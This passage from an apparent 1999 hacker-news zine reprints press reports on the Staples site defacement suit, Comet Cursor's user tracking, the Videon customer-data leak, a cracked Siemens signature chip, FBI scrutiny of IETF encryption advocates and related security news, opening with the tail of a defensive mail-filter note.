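Run it and message 0 is flagged on all three indicators while message 1, a normal reply with an ordinary attachment, passes; the WIN.INI check reports the run= line. The body and attachment checks are the ones worth keeping in a mail gateway rule; the "Re:" heuristic is deliberately gated on another hit because every legitimate reply carries it too.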
@HWA
05.0 Staples Files Suit Against Unknown Defacer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Staples Inc. has filed a lawsuit in US District Court in
Boston charging that "John Doe," an unidentified cyber
intruder, illegally accessed the company's Web site and
damaged the company by stealing e-commerce
business. The defacement that occurred on October
9th, featured advertisements for products at Home
Depot. Staples hopes to identify the intruder shortly.
(How do you sue an unknown person?)
Boston Globe
http://www.globe.com/dailyglobe2/334/business/Staples_files_suit_against_Web_hacker+.shtml
Associated Press
http://library.northernlight.com/EB19991130960000057.html?cb=0&dx=1006&sc=0#doc
Staples files suit against Web hacker
By Shelley Murphy, Globe Staff, 11/30/99
Shopping on line may be the best way to avoid holiday crowds, but
customers visiting Staples's Web site one day last month encountered a
unique problem when they unwittingly found themselves in a competitor's
store.
A hacker broke into the Framingham office-supply retailer's Internet site,
www.staples.com, on Oct. 9 and posted advertisements for one of the
company's major competitors, Office Depot.
Shoppers clicking on Office Depot products were linked immediately to the
home page of Staples's major competitor, which is based in Delray Beach,
Fla.
Officials at Staples Inc. filed a lawsuit in US District Court in Boston
yesterday charging that ''John Doe,'' the unidentified hacker, illegally accessed
the company's Web site and damaged the company by stealing e-commerce
business.
The suit contends that the hacker is believed to live in or near Massachusetts
and that the company expects to identify him shortly.
''We consider it highly unlikely that...our competitors were involved in any
way,'' said Shannon Lapierre, public relations manager of Staples, speculating
that the changes to the Web site may have been a prank.
But Staples, which just announced third-quarter Internet sales revenue of $24
million, is taking the Web-site intrusion seriously and is determined to identify
the culprit and report him to federal authorities, Lapierre said.
Meanwhile, federal authorities have been on the lookout for Internet fraud.
Federal law prohibits unauthorized access to a computer and calls for as
much as 10 years in prison if damage is caused recklessly as a result of the
breach.
''Obviously e-commerce is a very important part of our business and very
important to the company,'' said Lapierre.
Staples's goal is to have 1 million on-line customers and $1 billion in Internet
sales by 2003, Lapierre said.
Staples, which did $7 billion in sales last year and which operates more than
1,000 office superstores, launched its Web site a year ago.
While monitoring the site Oct. 9, officials noticed that products advertised
throughout the Web site had been deleted and replaced with products bearing
the Office Depot logo.
The suit said that the Office Depot advertisements contained links to the
Florida company's Web site, meaning that Staples's shoppers who clicked on
the illegally advertised products were redirected to the competitor's Web site.
Shoppers were diverted from Staples to Office Depot for about an hour
before the problem was corrected, Lapierre said.
In addition to lost business, Staples alleges that it cost the company time and
money to repair its Web site and to determine the extent of the security
breach.
Calls to Office Depot, the world's largest seller of office products, were
referred to the company's vice president of public relations, who couldn't be
reached for comment late yesterday.
Lapierre said the problems created by the hacker had never happened to
Staples before. ''It's an interesting time we live in,'' she said.
Staples's stock rose yesterday to close at 23-13/16 in trading on the Nasdaq
market. Office Depot closed at 11 1/2, down , on the New York Stock
Exchange.
This story ran on page D01 of the Boston Globe on 11/30/99.
© Copyright 1999 Globe Newspaper Company.
Associated Press;
Story Filed: Tuesday, November 30, 1999 12:50 PM EDT
BOSTON (AP) -- Office supply store Staples has filed suit against an
unnamed hacker who broke into its Internet site and posted
advertisements that led Web browsers to the home page of one of its
chief competitors.
In the suit filed Monday in U.S. District Court in Boston,
Framingham-based Staples charged that the hacker, referred to as
``John Doe,'' illegally entered the site and damaged Staples by
stealing e-commerce business.
The suit claims that ``John Doe'' lives in or near Massachusetts, and
that the company expects to identify him shortly.
The hacker broke into the Staples Internet site on Oct. 9 and posted
advertisements for Office Depot. Shoppers who clicked on the Office
Depot products were linked to the Office Depot home page. The problem
was corrected after about an hour.
In the suit, Staples alleges that, aside from a loss of money, it cost
time and money to find and fix the security breach.
Staples officials speculated that changes to the Web page were a prank,
and discounted the possibility that its competitors were behind it.
Gary Schweikhart, an Office Depot spokesman, said Tuesday the company
was outraged by the computer hack and said Office Depot had no part in
it.
``We're not that dumb and at the same time we would not condone any
activity that is illegal and unethical,'' he said.
Federal law calls for a maximum of 10 years in prison if damage is
caused as a result of unauthorized access to a computer.
Staples, which did $7 billion in sales last year, launched its Web site
a year ago. The company hopes to have 1 million Internet customers and
$1 billion in Internet sales by 2003, Lapierre said.
Copyright © 1999 Associated Press Information Services, all rights reserved.
@HWA
06.0 Comet bows to consumer pressure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
contributed by Ted
Yesterday Comet Systems Inc. was accused of
collecting data on consumers' web surfing practices with
their free cursor-changing software. The software,
Comet Cursor, is installed on over 16 million systems and
tracks web usage of over 60,000 web sites. Following
rampant consumer outcry over the practice Comet
Systems has agreed to allow consumers to delete the
serial number used to track individual web surfing habits
and will also seek certification from Truste, the industry
privacy watchdog group. Truste's certification of Comet
Systems could take 45 to 60 days.
Associated Press - via San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/1137191l.htm
Software firm in privacy flap
BY TED BRIDIS
Associated Press Writer
WASHINGTON (AP) -- A company that offers free software to change an
Internet browser's computer cursor into cartoon characters promised
Tuesday to let people delete a serial number the company was using to
track customers across the Internet.
Responding to an outcry over the privacy implications of its software,
Comet Systems Inc. also said it will seek certification from Truste, an
organization that monitors whether Web sites are following the privacy
promises they make to consumers.
Truste said Comet Systems had ``significantly damaged the trust of their
customers.''
New York-based Comet Systems acknowledged Monday that its cursor software
-- used by more than 16 million people -- reports back to its own
computers with each customer's unique serial number each time that person
visits any of 60,000 Web sites that support its technology.
Those sites include dozens aimed at young children, such as those for the
Dilbert and Peanuts characters of United Feature Syndicate Inc. and the Ty
Inc. site for Beanie Babies.
Comet said it never violated customers' privacy because it does not
attempt to match its serial numbers against anyone's real-world identity.
But it said Tuesday it will allow customers to delete those numbers,
anyway, although the numbers helped Comet keep an accurate census of its
customers for marketing and billing purposes. Some Web sites pay Comet
based on the number of visitors using the cursor-changing technology.
Customers will be able to download a program starting Wednesday from
Comet's Web site, at www.cometsystems.com, to replace their serial number
with a meaningless number that isn't unique.
``If that's what we need to do to appease users, we'll do that,''
spokesman Ben Austin said.
Comet's certification to Truste could take 45 to 60 days. But that
organization only monitors data collected at a company's Web site, not by
its stand-alone software programs.
``We don't cover software privacy practices,'' Truste spokesman David
Steer acknowledged Tuesday. ``Comet Systems has realized they have
significantly damaged the trust of their customers, and they're looking at
ways to rebuild that trust.''
Critics said earlier that the company should have more openly disclosed
the behind-the-scenes transmissions, which are made without warning. They
also said it would not be difficult given today's technology to begin
correlating the Comet serial number with a consumer's identity if the
company suddenly decided to or if Comet -- with its extensive tracking
database -- were purchased by new owners willing to do that.
``The typical guy who goes to Best Buy and buys a computer and installs
this software, he'll never know about this stuff,'' said programmer Dave
Gale of Tampa, Fla. ``It's like a toy, but you wouldn't expect a toy to
follow you around on the Internet.''
Steer, the spokesman for Truste, said other companies also undoubtedly are
clandestinely monitoring the online behavior of their customers.
``I believe there are a lot of other software companies that are
collecting personal information and not disclosing it,'' he said. ``That
is just no longer acceptable.''
Internet discussion groups were filled Tuesday with messages from angry
people who believed the cursor software did or could violate their
privacy.
In a statement published on the company's Web site, Comet President Jamie
Rosen said the company was ``quite surprised'' at the privacy questions
because the software doesn't ask for a customer's name, e-mail address or
other personal information.
``We deeply regret that this has caused concern among our users and we
pledge to be a leader in the area of online privacy in the future,'' he
said.
@HWA
07.0 Personal Info of Canadian ISP Users Leaked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Astroboyz and dj.tazz
The personal information on almost 2,700 Internet users
in Manitoba Canada was stolen and spread across the
Internet. Users of the Videon Wave's Internet cable
services had their account numbers, along with
customer names, addresses, phone numbers, user
names and passwords stolen. The intrusion into Videon
systems took place almost two weeks ago; however, the
company never notified any of the affected customers.
The incident has not been reported to the local Police or
the RCMP.
Winnipeg Free Press
Does anyone have a better link? This one is about to
expire.
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3673?search
Hackers tear cover off Videon security
Tue, Nov 30, 1999
By Doug Nairne
Legislature Reporter
PERSONAL INFORMATION on almost 2,700 Videon cable modem customers has been
obtained by Internet hackers in what is being called one of the most
damaging computer attacks ever against a Manitoba company.
The information has become a hot property as it is passed around the
city's computer underground, while irate customers are demanding to know
why Videon didn't notify them that their names, phone numbers and
passwords had been taken.
The list includes 2,688 Videon account numbers, along with customer names,
addresses, phone numbers, user names and passwords.
Reid Eby, an Internet security consultant and president of Interlink
Online Services, said hackers could use the information to access people's
Internet accounts and send and receive e-mail as if they were the owner.
E-mail that has already been downloaded to a computer is safe, but
all incoming messages can be intercepted. There is no impact on Videon
cable TV subscribers, only cable modem users.
"If they got the user names and passwords, this is the worst incident I've
ever heard about locally," Eby said. "Given what is going on with hacking,
placing any client information on-line in this day and age is silly."
Eby said the Videon information would also be valuable for sale to direct
marketers and junk mailers, who would covet the contact data for high-end
computer users.
Anyone who does any business transactions on-line may also be in danger,
especially if their credit card numbers are transmitted back to them in a
receipt. Hackers could also use the information to "socially engineer" a
target, tricking people into revealing more information about
themselves or making their computers vulnerable to intrusion.
Videon spokeswoman Nadine Delisle said that a routine security sweep last
week showed that customer information had been pilfered. She claimed that
no passwords were obtained, although lists being circulated clearly
include passwords, user names and other information.
Despite the criminal nature of the intrusion, city police and RCMP said
the incident has not been reported to their investigators.
Sources say the hack took place during the second week of November, but
none of the Videon customers contacted by the Free Press yesterday knew
that anything had happened.
"I'm a little surprised that we were never notified about this," said
businessman Sam Katz, whose wife's personal cellular phone number is on
the list, along with his other information. "I'd like to think these
things are a little bit better secured."
Delisle said Videon decided the information wasn't sensitive, so customers
were not informed about the security breach.
"The risk seemed to be very minimal," she said. "It was not assessed to be
important."
Katz disagreed, saying he plans to find out why he wasn't notified.
Winnipeg police Const. Bob Johnson said companies often don't report
hacking because they are concerned about bad publicity.
Delisle said the incident was not "serious enough" to report to police.
"We closed the security hole so that this will not happen again, that was
the priority," she said.
But a spokeswoman with the Canadian Radio-television and
Telecommunications Commission said Videon customers can file a complaint
against Videon and demand an explanation.
"People should be able to get the reasons why their private information
was leaked out," she said.
The customer list contains a wide cross-section of Winnipeggers, including
doctors, business people, university professors, journalists and even
computer security experts. The hackers say they could pose as any one of
the people on the list, although there is no evidence that anyone
has done so yet.
Hackers contacted said they were particularly pleased to get the personal
information of one Videon customer -- a computer security expert who has
written articles on the psychology of hackers, describing them as geeks
and loners.
Meanwhile, Ron Campbell, another cable modem customer whose details have
been disclosed, said he is upset about the incident but that he doesn't
blame Videon for the security breach.
"I don't particularly think Videon could have stopped this from
happening," he said. "I assume they had some security in place."
PHOTO ILLUSTRATION BY JOE BRYKSA/WINNIPEG FREE PRESS
Hackers managed to breach Videon's security and gain access to customers'
personal files.
@HWA
08.0 First Internet Piracy Case in Japan
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Galleon
A 21-year-old student has been accused of illegally
distributing over 170 titles of game software for
different Nintendo machines. This is the first case of an
unauthorized delivery of game software via the Internet
in Japan.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/frm/leaf?CID=onair/asabt/news/85776
Hokkaido Police Pursue Unauthorized Net Delivery of Game Software
December 1, 1999 (TOKYO) -- The Hokkaido Prefectural Police's Sapporo Kita Station
alleged that a college student delivered unauthorized game software
over the Internet.
It sent papers on Nov. 25, 1999 to the Sapporo District Prosecutor's
Office for prosecution.
The 21-year-old student, who has been accused of illegally distributing
about 180 titles of game software for Family Computer (Famicon) and
Game Boy game machines made by Nintendo Co., Ltd., is suspected of
infringing on rights under the Copyright Law.
The case is the first disclosure of an unauthorized delivery of game
software via the Internet in Japan.
The college student reportedly distributed the software on his own
Web page, labeled as "information exchange," to seem as if the
delivery did not constitute downloading of game software.
Game software for sale is usually recorded in read-only memory (ROM).
The student ran software which emulates a game machine on a personal
computer, and stored the game software recorded in these ROMs on
a hard disk drive on the PC and uploaded it onto a Web server.
According to Association for Copyright for Computer Software (ACCS),
which assisted the police in the disclosure of the case, there
seemed to be a lot of downloading from the suspect's Web site, but
it does not know how many downloads were actually made.
An ACCS spokesman said that software distribution without authorization
of an author itself is unlawful. In addition, the suspect knew
the case was illegal, intentionally concealed the illegal uploading
and downloading and distributed not just a few software programs over
the Internet, the spokesman said.
ACCS assumes there must be many other cases of illegal uploading and
downloading of game software via the Internet. The association
therefore hopes that the disclosure of the case will serve as a warning
to the public.
[Comment by BizTech]
The disclosure of the illegal uploading and downloading of game software
was based on a "breach of the Copyright Law." However, there are various
applications of the Copyright Law depending on the case. In this case, the
college student was suspected of "infringing on the right of public
transmission under the Copyright Law."
"The right of public transmission (Article 23 of the Copyright Law) is an
author's proprietary right to transmit his or her work to the general public
via broadcasting and/or communications. For example, an author's authorization
will be needed for any broadcasting of a work in a television or radio program.
(Note. In Japan, granting of copyrights and collection of license fees for
the majority of musical works are performed by the Japanese Society for
Rights of Authors, Composers and Publishers (JASRAC).) Distribution of
works over the Internet is included in the public transmission right.
Distribution of any software and musical data over the Internet shall constitute
infringement on the public transmission right and thus breaches the Copyright Law.
(Note. Any case which constitutes "reference" under the Copyright Law
shall be excluded from this case.)
For example, if someone transforms Celine Dion's hit number, "My heart will go
on," into MIDI data without obtaining Dion's permission and plays the song
on his or her own Web site as background music, strictly speaking such
an act would constitute infringement of the public transmission right.
(Note: Any works whose copyright is obviously expired shall be excluded from
this case. For example, any distribution of MIDI data of well-known works
such as a composition made by Mozart, Beethoven or Chopin, is generally
legal.)
In this case, the college student uploaded game software on a Web server
without obtaining authorization of the authors of the game software, and
enabled anybody who can access the Web site to download the software
programs. This is called "enabling of public transmission." The case infringes
on the public transmission right.
In addition to infringing on the public transmission right, the suspected
student also breached the Copyright Law for uploading of the game software on
the Web server because the student made unauthorized copies of software
(Infringement on the reproduction right, Article 21 of the Copyright Law).
In the case, the suspect made unauthorized copies when copying the game software
from ROMs to the hard disk drive of his or her PC and when copying it from
the hard disk drive to a hard drive on the Web server. Because the suspect's
ultimate objective was to distribute the software over the Internet, the
case does not constitute a "reproduction for private use" under Article 30
of the Copyright Law, and thus breaches the Copyright Law. The suspect repeatedly
breached more than one provision of the Copyright Law, even though the other
breaches were not disclosed.
(Kazumi Tanaka, Deputy Editor, BizTech News Dept.)
@HWA
09.0 FBI Launches InfraGuard in Ohio
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A national program known as InfraGuard, developed by
the FBI to promote information sharing among law
enforcement, industry, the academic community and the
public about computer network intrusions and computer
system vulnerabilities, was officially launched in Ohio
yesterday. Over 200 people were expected at the
kickoff meeting. (Watch for an exclusive insiders report
on InfraGuard coming soon to HNN.)
The Cincinnati Post
http://www.cincypost.com/news/hacker112999.html
CINCINNATI POST
FBI leads new effort to help
thwart hackers
Post staff report
Nearly 200 people were expected at today's kickoff
meeting of a group organized by the FBI to thwart
hackers from breaking into government, industry and
academic computer systems in Cincinnati and southern
Ohio.
Speakers included Cincinnati FBI agent in charge
Sheri Farrar, Southern Ohio U.S. Attorney Sharon
Zealey, Ohio Bureau of Criminal Identification and
Investigation Superintendent Ted Almay and
representatives from the FBI's National Infrastructure
Protection Center.
The regional meeting, held at Deer Creek State Park
in Pickaway County, is part of a national program
developed by the FBI and industry to promote
information sharing among law enforcement, industry,
the academic community and the public about
computer network hacking and computer system
vulnerabilities.
So-called ''InfraGard'' chapters are designed to help
protect the nation's information systems from cyber
and physical threats. The Cincinnati FBI's chapter
includes the 48 southern-most Ohio counties, including
Cincinnati, Dayton and Columbus.
A national InfraGard program was developed after
President Clinton directed the FBI to identify and
coordinate computer infrastructure protection experts
inside and outside the federal government.
Members of the Cincinnati chapter include the Ohio
Supercomputer Center, American Electric Power,
Ohio State University and Bank One.
Members eventually will have access to an Alert
Network that will allow them to use encryption
technology to report attacks on their computer
systems to the FBI. The FBI will provide what it calls
a ''sanitized'' description of the incident, without
identifying the source of the report, to other chapter
members so they can take actions to protect their own
systems.
Members also will have access to an InfraGard Web
site being created by the FBI that will provide timely
information about computer protection issues.
Target: Hackers
InfraGard is seeking more regional chapter members
from telecommunications, banking, energy and
transportation industries, as well as from academic
institutions, hospitals and government agencies.
For more information, call Cincinnati FBI agent
Roger Wilson at (513) 421-4310.
Publication date: 11-29-99
@HWA
10.0 National Gun Database Goes Online
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
A national gun database, Online Lead, was activated
Tuesday at all 331 branches of the Treasury
Department's Bureau of Alcohol, Tobacco and Firearms.
The system is available to police and other local law
enforcement officials through ATF offices. The database
included the gun's make and serial number, and the
complete chain of sale from manufacturer to wholesaler
or distributor to the first retail sale by a federally
licensed gun dealer. Officials have said that security
measures to protect the database from malicious
intruders have been taken but did not elaborate.
Associated Press
http://library.northernlight.com/EB19991130720000025.html?cb=0&dx=1006&sc=0#doc
Story Filed: Tuesday, November 30, 1999 11:44 AM EDT
WASHINGTON (AP) -- Federal and local law enforcement officials are getting
a new high-tech tool to fight crime: a nationwide computer system that
aims to trace guns used during crimes.
The system, called Online Lead, is administered by the Treasury
Department's Bureau of Alcohol, Tobacco and Firearms and has been
operating on a limited trial basis since February.
``Online Lead takes our fight against gun traffickers into cyberspace,''
said Treasury Secretary Lawrence Summers, who made the announcement today.
``It gives federal, state and local law enforcement officials throughout
the country a new tool to help identify and arrest gun
traffickers.''
Starting today the computer system is operating full time and is widely
available. Specifically, the system is in use at all 331 ATF field
offices. Although police and other local law enforcement officials can't
tap directly into the system on their own, they can access the
system through ATF.
Local law enforcement officials are encouraged but not required to ask ATF
to trace guns used during crimes. The results of those traces are entered
into a growing national database, which now has information on more than 1
million traced firearms.
ATF has been tracing guns used in crimes for years, but the sophisticated
software used in the new online system should make it much easier for
investigators to analyze trends and patterns in illegal firearms
trafficking, law enforcement officials said. For police and other
local law enforcers, the system may provide new leads and additional
information about crimes, they said.
Online Lead is updated frequently and provides information on a traced gun
one day after it is completed.
The new system evolved from earlier projects that aim to provide
investigators access to data on guns used in crimes. Those systems stored
information on traced guns on computer discs that had to be shipped to ATF
field offices, a slow process. The new online system gives law
enforcers fast access to such information.
Information about all firearms traced by the ATF goes into the national
database and is available on the new online system. What agents can trace
is limited. They start with a gun's make and serial number, moving forward
from the manufacturer to a wholesaler and distributor to the first
retail sale by a federally licensed gun dealer.
All sales by licensed dealers must be recorded, and those records must be
made available to ATF. But any sales by individuals or by collectors at
gun shows, for example, are considered private and exempt from such
record-keeping requirements.
Copyright © 1999 Associated Press Information Services, all rights reserved.
@HWA
11.0 Zero Knowledge Ships Freedom, Finally
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Jordan
After what seemed like an agonizingly long beta period
Zero Knowledge Systems has finally shipped Freedom
1.0. Freedom works seamlessly alongside your favorite
browser and other Internet applications. You can surf
the web, send email, chat, telnet, and participate in
newsgroups as you normally would, only now with
complete confidence that your personal information is
not being collected without your consent. Freedom
identifies you on the net with a 'nym' that you choose.
There can be only one 'nym' so unless you want
something like 'Tom4538720' you should reserve yours
today.
Freedom 1.0
http://www.zks.net/clickthrough/click.asp?partner_id=542
@HWA
12.0 OpenBSD 2.6 Ships
~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Theo
What is probably the most secure operating system
available has shipped its new version. OpenBSD 2.6 is a
FREE, multi-platform 4.4BSD-based UNIX-like operating
system. It emphasizes portability, standardization,
correctness, proactive security and integrated
cryptography. Some of the new features include the
addition of ssh (OpenSSH) and Perl 5.005_03 to the
base system, reliability patches for the PowerPC port,
improved support for ext2fs, USB support, a faster
install process and a lot more.
OpenBSD
http://www.openbsd.org/
@HWA
13.0 Videon Was Warned of Data Loss
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by dj.tazz and P_Simm
The Canadian ISP, Videon, was warned that it had left
its customer database available on the web for all to
see. Days later, after the database had made the
rounds on the net, the security issue was resolved.
Customers, however, were never notified by the
company. They did not find out about the problem until
weeks later when it appeared in the local newspaper.
Videon has confirmed that they received the emailed
warning and failed to act in a timely manner to prevent
the loss of customer account numbers, names,
addresses, phone numbers, user names and passwords.
Winnipeg Free Press
http://205.200.191.20/cgi-bin/LiveIQue.acgi$rec=3772?search
Videon ignored Web security breach
E-mail warning of leak never received reply
Wed, Dec 1, 1999
By Doug Nairne
Legislature Reporter
VIDEON WAS warned that its cable modem customer list was left unprotected
on the Internet but failed to act for at least a day, allowing hackers a
chance to pilfer the sensitive information, the Free Press has learned.
An e-mail message identifying the security leak was sent to Videon
security staff on Nov. 10, which is thought to be the day prior to when
personal details on about 2,700 people were downloaded.
A man who asked to be identified only by his computer user name, "Grub,"
said he sent the warning after stumbling on the customer data base while
surfing the Videon Web site.
Despite Videon's insistence that the information was taken after a
"deliberate attack," Grub said he found it sitting out in the open where
anyone could have seen it.
"When I found this I thought, 'Holy smokes, I can't believe this is up
there,' " he said. "They might as well have written out the list and taped
it to the front door."
Grub said he e-mailed Videon warning them of the problem but never
received a reply.
"They make it sound like a big computer attack, but it was probably just
their own stupidity," he said.
Sometime later, the list was discovered by someone else and copies began
to be made. According to Videon, customer names, addresses and phone
numbers have been posted to an Internet chat group, where it would be
widely accessible.
Videon spokeswoman Nadine Delisle confirmed that Videon received the
warning e-mail. She said that a combination of bad judgment by staff and
the Remembrance Day holiday resulted in the message initially being
ignored.
"At the time it was not perceived to be a big risk," she said. "In
retrospect, that may have been an error in judgment."
Hackers ended up getting what they describe as a gold-mine of information,
including account numbers, names, addresses, phone numbers, user names and
passwords. They say the information can be used to intercept people's
e-mail or to assume someone else's identity on the Internet.
After playing down the security leak Monday, Videon was scrambling to deal
with the crisis yesterday. Senior executives and communications staff were
in emergency meetings most of the day.
Delisle said Videon was planning a massive e-mail broadcast to all its
cable modem customers to inform them of the incident, and will provide
instructions on how to take precautions like changing passwords.
She said Videon also wants to reassure people that their billing
information and credit card numbers were not revealed.
An internal investigation is being carried out, and an outside firm will
be brought in to do a full security audit, Delisle said.
About a dozen angry customers called the Free Press yesterday, most
wanting to know why Videon didn't tell anyone what had happened --
including the police -- until yesterday, more than two weeks after they
found out the information was taken.
While passwords can be quickly changed, other information like addresses
and phone numbers are also being passed around, leaving people vulnerable.
One woman, who asked not to be identified, said she is outraged that she
was not told her information had been downloaded.
"Anyone with a computer may be able to get my name and phone number, and
address," she said. "My daughter won't be playing outside alone anytime
soon, because now I won't know if some pervert has gotten my address and
is lurking around my house."
The woman said she is considering cancelling her account.
Delisle said that in retrospect the decision to keep the incident quiet
may not have been the right one.
"We're still piecing together all the details of what happened," she said.
"The important thing is that this does not happen again."
Videon will set up a Web site to help customers at www.videon.ca/secure
and also plans to take out ads in Winnipeg newspapers to explain what
happened.
Videon customers have set up at least one other site with instructions on
changing passwords. After being on-line for only 90 minutes, the site had
29 hits.
@HWA
14.0 German Digital Signature Chip Broke
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by cripto
After months of intense lobbying for a secure system
and only days after being ratified by the European Union
the German Digital Signature has been broken. The
digital signature card, developed by Siemens, is to be
used in cashless payment systems and access control
systems. With data dumps of the SLC44/66 chip and
information explaining its design floating around the
Internet anyone using the so-called Geldkarte system
stands the risk of having money transferred without
their knowing it.
The UK Register
http://www.theregister.co.uk/991201-000021.html
Posted 01/12/99 4:19pm by Mike Magee
Siemens German digital signature chip hacked
Hackers have succeeded in cracking the Siemens digital signature card used in
cashless payment systems and access control systems across the country.
The German Digital Signature was ratified by the European Union only a few days
ago, after intense lobbying for a secure system for transactions.
The serious breach of security means that anyone using the so-called Geldkarte
system stands the risk of having money transferred without their knowing it.
A disassembled dump of the SLC44/66 chipcard CPU in TeX, along with two pages
of German text explaining the design has been available on bulletin boards for some
time, according to the source.
The dump is currently being re-engineered and commented, according to a source,
and the knowledge gained has already been used to get hold of Telesec private keys.
@HWA
15.0 IETF Members Under Investigation For Treason
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Some members of the Internet Engineering Task Force
seem to be under investigation by the DOJ and FBI. The
reason for the investigations seems to be the desire to
include encryption and exclude back door capabilities in
new protocols proposed by the IETF. The investigations
are centered around treason charges.
NT Security
http://www.ntsecurity.net/go/2c.asp?f=/news.asp?IDF=186&TB=news
ZD Net
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2398590,00.html
Crypto Advocate Under FBI Investigation
Tuesday, November 30, 1999 - We recently published a story
regarding cryptography and IPv6, where someone at the
Department of Justice accused Scott Bradner, Internet Engineering
Task Force (IETF) area coordinator, of an anti-social act by trying to
get encryption inserted into the new protocol. Later, at an IETF
meeting where votes were taken for IPv6 encryption inclusion, Fore
System's Brian Rosen brazenly claimed that regardless of any
encryption inclusion, Fore systems would proceed by including back
doors into any included encryption technology. But the harassment
of the IETF doesn't stop there.
Just how far will our federal government go towards controlling
strong encryption? Apparently, very far. And this isn't a new effort
by any means. We learned that William Allen Simpson, a
Detroit-based computer consultant who was on the IETF staff, has
been investigated by the federal government for treason charges.
Simpson was the person that argued loudly for encryption to be
included in the PPP protocol when it was still in design phases. That
push landed Simpson in hot whatever with federal officials. Simpson
learned through friends that he was under investigation for treason
-- the FBI had been interviewing his friends and associates.
Simpson obtained 54 pages of documents from the government under
the Freedom of Information act, however the documents were
heavily censored, including the bureau's basis for the investigation.
According to a ZDTV report, Simpson did learn that the FBI had
accused him of "challenging authority and laws that may impinge
upon his activities."
Wait a second! Isn't that part of what the Constitution is all
about--the means to peacefully object to the laws of the land? I
think so. And if that's true, then that certainly positions the FBI in a
bad light since it would appear their actions are counter to the
Constitutional rights. It is not against the law to develop strong
cryptography, but it is against the law to export that technology
outside of proper governmental controls. The PPP protocol did not
have encryption at the time--it was only a suggested inclusion--so
why investigate a person for doing something completely legal?
The IETF is an open public standards body that conducts its business
in clear public view. They help steer standards that better ensure
compatibility and interoperability. So why would the FBI investigate
an IETF member just because that person suggested in a public
meeting that strong encryption be included in a standard
wide-spread protocol such as PPP?
ZDnet;
The New Crypto-Commies
Could arguing for strong encryption be
the next 'un-American activity' that
justifies blacklists and secret FBI
investigations?
By Kevin Poulsen November 24, 1999
Newly released documents show that the
FBI closely monitored a key member of the
standard-setting Internet Engineering
Task Force (IETF) in 1992 and 1993, as
he waged a doomed battle to inject
crypto support into an emerging critical
Internet standard.
William Allen Simpson, a Detroit-based
computer consultant, was on the IETF.
The team was developing the "Point to Point
Protocol" (PPP), designed to
facilitate Internet access over dial-up
modems. Simpson was making waves in
the PPP Working Group by loudly arguing
for inclusion of crypto support in the
protocol, which today is used by the vast
majority of home Internet users to go
online.
In 1993, Simpson learned from a family
member and colleagues that his efforts
had drawn the FBI's interest. As he recalls
it, the bureau was accusing him of a
capital offense.
"Two guys came up to me at a meeting,"
Simpson recalls. "They said, 'Bill, I was
interviewed for a treason investigation by
the FBI'."
"Bill was advocating encryption for
authentication and for privacy in
standardized Internet protocols," recalls
Electronic Frontier Foundation cofounder
John Gilmore, who heard of the
investigation and suggested that Simpson
request his FBI file under the Freedom of
Information Act.
"He's kind of an iconoclast," Gilmore told
me. "He follows his own way and
sometimes it pisses people off, but it can
be an advantage when you're faced with
a Kafkaesque investigation by the
government. He has the tenacity to stick
with it until he finds the truth."
After six years of wrangling, Simpson
finally pried 54 pages from the grasping
hands of the domestic spies last
Wednesday, only to find that the
documents were heavily censored.
@HWA
16.0 Jane's Releases Cyberterrorism Report
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by turtlex
Jane's Information Group has released its much
anticipated report on cyberterrorism. While the actual
information in the article seems rudimentary and crude
its conclusions about the possibility of a full out terrorist
attack over the internet being extremely remote seem
dead on. (Warning: this is an extremely long and dry
article that presents little new information.)
Jane's Defense Weekly
http://jir.janes.com/sample/jir0525.html
Cyberterrorism hype
With the 1990s propensity to dot.com everything that moves, 'hacking' and
'cyberterrorism' have become subjects of intense media coverage. Almost daily,
hitherto unknown security specialists warn of potential catastrophes: news that
gets picked up by the media and crosses the globe with impunity. Johan J
Ingles-le Nobel discussed the subject with programmers at Slashdot to profile
so-called cyberterrorists and examine the viability of cyberwarfare.
Cyberterrorism is a buzzword of 1999. Indeed, with the
remarkable growth of the Internet, hacking horror stories
have reached new heights of publicity, leading to a veritable
media frenzy. Yet careful examination of the issue reveals
much of the threat to be unsubstantiated rumour and media
exaggeration. The exaggeration is understandable, however
- these technologies underpin our entire society, and what paper can resist
printing a scoop revealing that banks are being blackmailed with threats of
attacks on their computers, or that a military satellite has been hijacked by
hackers? The idea that an anonymous teenager working alone from his bedroom
can wreak electronic havoc on the far side of the world makes for good press.
What is a hacker?
Nothing gets a hacker's back up quicker than someone confusing a hacker with
cracker. The term 'hacker' refers to an individual who programmes
enthusiastically (even obsessively), enjoys programming or is especially good at
programming; a 'cracker' is somebody who breaks into another's computer
systems or digs into their code (to make a copy-protected programme run). Yet
the boundaries have become somewhat blurred and the popular understanding of
these terms is quite wrong: ever since Hollywood produced 'Wargames', based
on Kevin Mitnick's cracking activities (known as 'exploits'), the term 'hacking' has
become synonymous with unauthorised access into restricted systems - which
is 'cracking'. In today's world, such activity also includes the deliberate
defacement of websites. Hackers are quick to point out that there is a code of
hacker ethics that precludes any profit from the activity - the only motive is the
activity itself - but they are not naïve: realising the potential for misuse, they
